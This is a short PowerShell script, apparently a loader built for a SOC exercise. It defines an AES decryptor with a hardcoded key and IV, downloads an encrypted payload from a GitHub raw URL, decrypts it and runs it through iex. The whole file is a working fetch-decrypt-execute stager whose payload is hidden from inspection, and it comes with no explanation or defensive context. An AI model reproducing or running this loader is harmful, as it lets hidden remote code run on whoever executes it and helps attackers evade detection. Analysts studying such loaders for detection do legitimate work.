function D {
    param($e, $k, $i)
    $a = [System.Security.Cryptography.Aes]::Create()
    $a.Key = $k
    $a.IV = $i
    $a.Padding = "PKCS7"
    $d = $a.CreateDecryptor()
    $b = [Convert]::FromBase64String($e)
    $m = New-Object IO.MemoryStream
    $c = New-Object Security.Cryptography.CryptoStream($m, $d, 'Write')
    $c.Write($b, 0, $b.Length)
    $c.Close()
    [Text.Encoding]::UTF8.GetString($m.ToArray())
}

# AES key + IV for decrypting payload.b64
$k = [Convert]::FromBase64String("Q3K1OxDixc03IRcJusRx7mbJX15GuNORMw2PuFevUfA=")
$i = [Convert]::FromBase64String("kXHMQaoW9ayabOL5BKBI3w==")

try {
    $url = "https://raw.githubusercontent.com/mashiachilov/TaskForSOC/main/payload.b64"
    $raw = Invoke-WebRequest -Uri $url -UseBasicParsing
    $p = ($raw.Content -replace '[^A-Za-z0-9+/=]', '').Trim()
    $s = D $p $k $i
    iex $s
} catch {
    Write-Error "[-] Failed to fetch or execute encrypted payload: $_"
}
